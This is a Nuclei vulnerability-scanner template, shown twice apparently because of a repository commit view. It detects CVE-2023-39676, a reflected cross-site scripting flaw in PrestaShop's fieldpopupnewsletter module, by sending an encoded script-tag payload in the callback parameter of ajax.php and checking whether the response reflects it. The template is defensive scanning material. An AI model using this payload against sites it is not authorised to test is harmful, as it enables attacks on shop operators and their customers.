nuclei-templates/http/cves/2023/CVE-2023-39676.yaml

id: CVE-2023-39676
info:
  name: PrestaShop XSS in fieldpopupnewsletter module
  author: meme-lord
  severity: medium
  description: PrestaShop module fieldpopupnewsletter is vulnerable to XSS
  reference:
    - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/
  tags: cve,cve2023,prestashop,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(0)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "<script>alert(0)</script>"
          - "Invalid email"
        condition: and
added template for CVE-2023-39676 FieldPopupNewsletter XSS 2023-09-07 09:43:17 +00:00			`id: CVE-2023-39676`
			`info:`
			`name: PrestaShop XSS in fieldpopupnewsletter module`
			`author: meme-lord`
			`severity: medium`
			`description: PrestaShop module fieldpopupnewsletter is vulnerable to XSS`
			`reference:`
			`- https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/`
			`tags: cve,cve2023,prestashop,xss`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(0)%3C/script%3E"`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`part: body`
			`words:`
			`- "<script>alert(0)</script>"`
			`- "Invalid email"`
			`condition: and`